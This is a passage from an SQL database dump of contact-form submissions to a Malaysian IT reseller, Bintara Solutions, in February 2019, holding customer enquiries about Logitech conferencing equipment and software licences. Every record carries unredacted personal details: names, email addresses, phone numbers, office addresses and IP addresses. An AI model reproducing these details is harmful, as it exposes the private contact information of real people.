SOLUTiONS\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:189:\"i&#039;m looking for a solutions to produce &amp; bluetooth printing on-site(outdoor activities) , waistband tag bracelets, jus t like The Sunway Lagoon Waterpark ticket. plz response asap.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"71\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-21 14:29:09','115.133.43.130','1'),(72,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Wong Jin Kee\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"cdpl.it@icapital.biz\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0320702104\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Capital Dynamics Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:128:\"16.01B, Plaza First Nationwide, 161, Jalan Tun H S Lee, City Centre, 50000 Wilayah Persekutuan, Wilayah Persekutuan Kuala Lumpur\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"Logitech Group, Group Expansion Mics\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"11\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-21 16:59:04','60.54.37.207','1'),(73,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Jegatheswaran\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"jegatheswaran@mbfh.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0129859858\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"MBf Holding Berhad\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:81:\"I would like to purchase Dropbox for Business 3 TB. What is the price you offered\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"72\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-22 14:30:06','219.92.13.153','1'),(74,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"BAKTIAR BIN MOHD NOR\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"pase71@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"01127282219\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"PA SYSTEM ENGINEERING\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:213:\"Please quote us the Logitech Meetup System including the tv mounting. TV size is 75&quot;. Qty is 1 unit. This is for UiTM Johor tender which will be closing on 27/02/2019. Please feel free to contact me Urgently.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-25 10:03:27','175.138.58.160','1'),(75,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"harinder\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"harinder@chevron.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0126617212\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"chevron malaysia limited\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"level 3 menara milenium\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:40:\"Logitech Group, Group 10m Extended Cable\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-25 14:23:55','146.23.203.233','1'),(76,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Valerie Lee\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"valerie@wisdomplus.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0124769950\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"WISDOM PLUS (M) SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:39:\"Logitech Web-Cam C170 (WebCam with Mic)\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-26 14:17:43','175.140.249.67','1'),(77,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"Azani\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"azanio@azanio.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122283556\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Azanio Inc.\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:112:\"Looking for video conferencing solution. I have been calling today since 2:40PM... NO one picked up the phone...\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"11\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-26 14:41:59','115.134.146.42','1'),(78,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Ahmad Fitri Bin Mohd Natar\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"fitri@plus-solar.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"011 26342196\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Plus Solar System Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:101:\"L5-E-7A, Enterprise 4, Technology Park Malaysia, Lebuhraya Puchong-Sg.Besi, Bukit Jalil, Kuala Lumpur\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Add in 1 Rally mic pod\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-26 16:22:27','202.129.165.226','1'),(79,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"AMEER JASRIE JAMIL\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"ameerjasrie@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60103690054\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:35:\"MALAYSIAN HOUSE OF INTERNET SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"abode acrobat reader pro 5 unit\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"00\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn 